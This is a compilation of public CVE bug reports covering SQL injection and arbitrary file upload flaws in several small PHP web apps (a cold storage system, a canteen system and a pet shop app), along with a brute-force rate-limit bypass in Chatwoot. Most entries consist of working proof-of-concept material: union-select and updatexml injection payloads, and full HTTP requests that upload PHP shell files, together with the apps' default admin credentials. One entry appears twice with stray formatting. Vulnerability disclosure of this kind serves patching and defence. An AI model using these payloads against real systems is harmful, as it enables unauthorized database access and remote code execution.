Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /bookings/update_status.php.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: QiaoRui feng

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/bookings/update\_status.php?id=

Vulnerability location: /csms/admin/bookings/update\_status.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/bookings/update\_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/bookings/update\_status.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-43229: bug_report/SQLi-2.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*# Canteen Management System v1.0 by mayuri\_k has SQL injection

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*

CVE-2022-43232: bug_report/SQLi-2.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/manage\_website.php

Loophole location: Canteen Management System's manage\_website.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /youthappam/manage\_website.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/youthappam/manage\_website.php
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13868104343107
Content-Length: 1811
\-----------------------------13868104343107
Content-Disposition: form-data; name="title"
Admin Panel by 
\-----------------------------13868104343107
Content-Disposition: form-data; name="footer"
Admin PanelÃ�Â 
\-----------------------------13868104343107
Content-Disposition: form-data; name="short\_title"
9090908080
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_code"
India
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_symbol"
Ã¢â��Â¹
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_website\_image"
shell.php
\-----------------------------13868104343107
Content-Disposition: form-data; name="website\_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_invoice\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="invoice\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_login\_image"
logo.png
\-----------------------------13868104343107
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_back\_login\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="back\_login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="btn\_web"
\-----------------------------13868104343107--

The files will be uploaded to this directory \\youthappam\\assets\\uploadImage\\Logo\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43231: bug_report/RCE-1.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedUser.php

Vulnerability location: /youthappam/php\_action/fetchSelectedUser.php, userid

dbname =youthappam,length=10

\[+\] Payload: userid=-1 union select 1,database(),3,4 // Leak place ---> userid

POST /youthappam/php\_action/fetchSelectedUser.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
userid=-1 union select 1,database(),3,4

CVE-2022-43233: bug_report/SQLi-1.md at main · HKD01l/bug_report

Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=bookings/view_details.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: QiaoRui feng

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/?page=bookings/view\_details&id=

Vulnerability location: /csms/admin/?page=bookings/view\_details&id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/?page=bookings/view\_details&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /csms/admin/?page\=bookings/view\_details&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-43230: bug_report/SQLi-1.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Pengxuan Li

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/php\_action/editProductImage.php?id=1

Loophole location: Canteen Management System's editProductImage.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /youthappam/php\_action/editProductImage.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/youthappam/edittest.php?id=1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------88582622926272
Content-Length: 422
\-----------------------------88582622926272
Content-Disposition: form-data; name="old\_image"
\-----------------------------88582622926272
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------88582622926272
Content-Disposition: form-data; name="btn"
\-----------------------------88582622926272--

The files will be uploaded to this directory \\youthappam\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43275: bug_report/RCE-1.md at main · 01001000entai/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the productId parameter at /php_action/fetchSelectedfood.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Pengxuan Li

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedfood.php

Vulnerability location: /youthappam/php\_action/fetchSelectedfood.php, productId

dbname =youthappam,length=10

\[+\] Payload: productId=-1 union select 1,database(),3,4,5,6,7,8,9 // Leak place ---> productId

POST /youthappam/php\_action/fetchSelectedfood.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
productId=-1 union select 1,database(),3,4,5,6,7,8,9

CVE-2022-43276: bug_report/SQLi-1.md at main · 01001000entai/bug_report

Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. \n\nFor the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.

**Description**

Chatwoot relies on the rack\_attack.rb file to defend the application against various brute force attacks. The Chatwoot application fails to prevent brute force attacks against the listed paths when strings are appended to the end of POST directory names. Some protection still exists, primarily where more than 300 requests are made in a minute, which appears to be a default rule for the application and configuration. Provided an attacker keeps attacks within 300 per minute it is possible to bypass the configured rules.

The vulnerability was discovered in all tested directories, including:  
\-- /auth/sign\_in.json  
\-- /api/v1/accounts.json  
\-- /super\_admin/sign\_in.json

As I cannot configure the environment to test the other parameters, I am unsure if they are vulnerable, however the directories do accept random strings appended to the end. NOTE - Any arbitrary add on to the end of the directory can bypass the restrictions.

Note that I have tested a possible fix for the issue locally by modifying existing rack\_attack rules.

**Proof of Concept**

    POST /auth/sign_in.json HTTP/1.1
    Host: 192.168.1.3:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.3:3000/app/login
    Content-Type: application/json
    Content-Length: 74
    Origin: http://192.168.1.3:3000
    DNT: 1
    Connection: close
    Cookie: _chatwoot_session=isHDBFZBkWRHKTcjNmQPFlXVrtaswMNx7FNWeWpiULOnK%2FQakqLzHkfvY33zDMNhewz%2FBgh6VeEqUYoj3a6UA1HjD9WcQW3M0m2pM5N9Jmv88sSRp%2BiEA9dOAP9rhF3WHOIzL%2FI1BA0yWrYOMVZs6IpkAPD%2Fm3kz9E27rxzJ9%2B5fESTBmcJ0LEMT1nB8DvVRj8ULgac0RrjJOjEwySniIbg7HMOKNfP5PeF3FoodUKrhFZE%2F3SReiAt7q2FlHKVVzlwjTdjcz1sYcDTkblkVPRAFt1tYvV6oCA%3D%3D--flwWFZDdAvtdfTYe--tihOFN%2Bg9HKViJZPwD27jQ%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899
    
    {"email":"joe@mayorsec.com","password":"Password123!","sso_auth_token":""}
    

    POST /super_admin/sign_in.json HTTP/1.1
    Host: 192.168.1.3:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.3:3000/super_admin/sign_in
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 234
    Origin: http://192.168.1.3:3000
    DNT: 1
    Connection: close
    Cookie: _chatwoot_session=1eo0NEleyD9vD3SZGSC5fmQ8%2FqjqauSZabHRTb79DXjlOr4U8zLfpx%2BWEarESorlTjxkoyywq1dQuYez%2BflouTKpf1kCnbrgpQUO0Ejxp2WcS4eX1xfvCwTmQ6mC3FplGhEhGxMYFiyUycwvh7%2Ba5gsmDLSlyNmLBQX%2FdzZY4VSgqJOvP2ttep5hMRorsoSsqBW4z8Sf6u5rCRGJxpMxCS2rL%2BgzCNpurXoswGmIVZ5soMtONk9x7wt42fynVbd2v5ukPwmf%2B%2BneGCXv6QUOI2TbXF7wC18NtKNjtEekVAP2kX8ZkyIS%2B%2FadCrtVcFVg6N4ZLwf7OK2VTiXuHynATmNbjQ2XFUhA0nH7b9yweJ8fGRpUfSv0E8Qpl%2F6r1uQCgdsVTx%2BXjtTpi0gVAIV%2F2%2BqDSzxQmD%2BR5AJQ7KZGnpYFNVYA1Nhje6i8zCwYzd9fTCTjd%2Bh2NZ4tvN6kpQ%3D%3D--7VQsNUvJAAZPOI0f--W7uERdZvn2dJqbk%2FLiftLg%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899; cw_d_session_info={%22access-token%22:%225KrfuMPZEbhzLOJ6cgSUdA%22%2C%22cache-control%22:%22max-age=0%2C%20private%2C%20must-revalidate%22%2C%22client%22:%22FyV_LCCm8MdrctlhgnT6Tg%22%2C%22connection%22:%22close%22%2C%22content-length%22:%22595%22%2C%22content-type%22:%22application/json%3B%20charset=utf-8%22%2C%22etag%22:%22W/%5C%227dd1dcb51fcc95eae77b2ec9c6ad96ce%5C%22%22%2C%22expiry%22:%221660161568%22%2C%22referrer-policy%22:%22strict-origin-when-cross-origin%22%2C%22token-type%22:%22Bearer%22%2C%22uid%22:%22joe@mayorsec.com%22%2C%22x-content-type-options%22:%22nosniff%22%2C%22x-download-options%22:%22noopen%22%2C%22x-frame-options%22:%22SAMEORIGIN%22%2C%22x-permitted-cross-domain-policies%22:%22none%22%2C%22x-request-id%22:%22b90b4747-6fea-44e2-a677-ebe87930ab16%22%2C%22x-runtime%22:%220.249821%22%2C%22x-xss-protection%22:%221%3B%20mode=block%22}
    Upgrade-Insecure-Requests: 1
    
    authenticity_token=WWh5xWO3jgXwVKZb3zWM94qL52osMpbCpFFeuxRsdlgb%2B7OtMdtb%2F4FjNpY68ZA4Q67TDc0iV6OsDsS5O4d8OQ%3D%3D&super_admin%5Bemail%5D=JOANNE%40mayorsec%2ecom&super_admin%5Bpassword%5D=Password123%21&super_admin%5Bremember_me%5D=0 
    

    POST /api/v1/accounts.json HTTP/1.1
    Host: 192.168.1.3:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.3:3000/app/auth/signup
    Content-Type: application/json
    Content-Length: 144
    Origin: http://192.168.1.3:3000
    DNT: 1
    Connection: close
    Cookie: _chatwoot_session=pOArRsb8vDx6%2FpQuywQLE3E0lznJlbGrnqLLNMT9ySqt7YR4eh%2BSdWTMW6dmES79X13k5aCblM30KNbNhw7mCnpqV26eYv2LrM6XrnIu8KDwl3pubsrWEKxO0iM%2F6uUxdnY3J2Qryff78SF8vn7HPkYvS00yyAQ6JFGAcOlUL38tU7C1LxVmlLPo958m47gmGwgYruLnFPn7Rur9Oz6NMTVlmLe2maTpqv4TFB%2FvKc6kP38fZunPGVeRxPwKasUAE4%2BXyUJkb5Z6MXhrqi8PENPlbkQ1dDkFRQ%3D%3D--Cu1By7B2Un6rncH9--wgscGhl5IJUSIrAiD5e0AQ%3D%3D
    
    {"account_name":"KATHRINE","user_full_name":"KATHRINE","email":"KATHRINE@mayorsec.com","password":"Password123!","h_captcha_client_response":""}
    

**Impact**

Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification.

For the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.

**Occurrences**

**References**

*   CWE-307 Improper Restriction of Excessive Authentication Attempts
*   OWASP OAT-019 Account Creation
*   OWASP Top 10 - A2:2017 Broken Authentication

CVE-2022-3741: Chatwoot's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks in chatwoot

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/classes/Master.php?f=save\_product

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the editing function of the product list module in the background management system

Request package for file upload：

POST /pet\_shop/classes/Master.php?f\=save\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=product/manage\_product&id=6
Content-Length: 2685
Content-Type: multipart/form-data; boundary=---------------------------162223033527413
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------162223033527413
Content-Disposition: form-data; name="id"
6
\-----------------------------162223033527413
Content-Disposition: form-data; name="category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="sub\_category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="product\_name"
Dog Belt
\-----------------------------162223033527413
Content-Disposition: form-data; name="description"
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas dui nulla, tincidunt in arcu at, vulputate volutpat velit. Quisque volutpat gravida erat, gravida porttitor magna malesuada sed. Curabitur massa est, ullamcorper a diam vitae, tincidunt sagittis justo. Nam eu orci ligula. Duis ullamcorper dui at nisi consequat, sed suscipit sapien lacinia. Praesent ut lacus id arcu bibendum egestas. Cras ullamcorper dictum mi, non commodo mauris iaculis a. Pellentesque porta sem id dapibus tincidunt. Aenean metus tellus, efficitur ut feugiat in, euismod et arcu. In pharetra, dolor in fermentum facilisis, metus urna lacinia metus, in maximus justo tellus et tortor. Nam pulvinar eu enim auctor pellentesque.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Nam ut quam velit. Suspendisse commodo non urna nec dictum. Pellentesque eget enim id velit bibendum auctor vel id lectus. Maecenas dolor nibh, ultricies eget metus vel, efficitur varius tellus. Donec semper eros sit amet urna bibendum scelerisque. Interdum et malesuada fames ac ante ipsum primis in faucibus. Integer cursus est in sapien sodales, quis pulvinar nisl aliquet. Pellentesque blandit diam lobortis pulvinar ornare. Sed venenatis imperdiet massa, ut mollis sapien sagittis a. Nulla dignissim ultrices metus a mattis. Nunc egestas mattis nisl at posuere. Donec malesuada ut justo sed aliquam. Sed venenatis sit amet tortor et semper. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Vivamus sit amet massa at massa malesuada volutpat quis nec libero.</p>
\-----------------------------162223033527413
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
\-----------------------------162223033527413
Content-Disposition: form-data; name="status"
1
\-----------------------------162223033527413
Content-Disposition: form-data; name="img\[\]"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------162223033527413--

The files will be uploaded to this directory \\pet\_shop\\uploads\\product\_6 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-39978: bug_report/RCE-1.md at main · z1pwn/bug_report

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the User module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

Permalink

Cannot retrieve contributors at this time

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/admin/?page=user ---> http://ip/pet\_shop/classes/Users.php?f=save

Loophole location：The editing function of the "user" module in the background management system there is an arbitrary file upload vulnerability in the picture upload point.

Request package for file upload：

POST /pet\_shop/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=user
Content-Length: 748
Content-Type: multipart/form-data; boundary=---------------------------192831994119577
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------192831994119577
Content-Disposition: form-data; name="id"
1
\-----------------------------192831994119577
Content-Disposition: form-data; name="firstname"
Adminstrator
\-----------------------------192831994119577
Content-Disposition: form-data; name="lastname"
Admin
\-----------------------------192831994119577
Content-Disposition: form-data; name="username"
admin
\-----------------------------192831994119577
Content-Disposition: form-data; name="password"
admin123
\-----------------------------192831994119577
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------192831994119577--

The files will be uploaded to this directory \\pet\_shop\\uploads 

We visited the directory of the file in the browser and found that the code had been executed

Tag

#firefox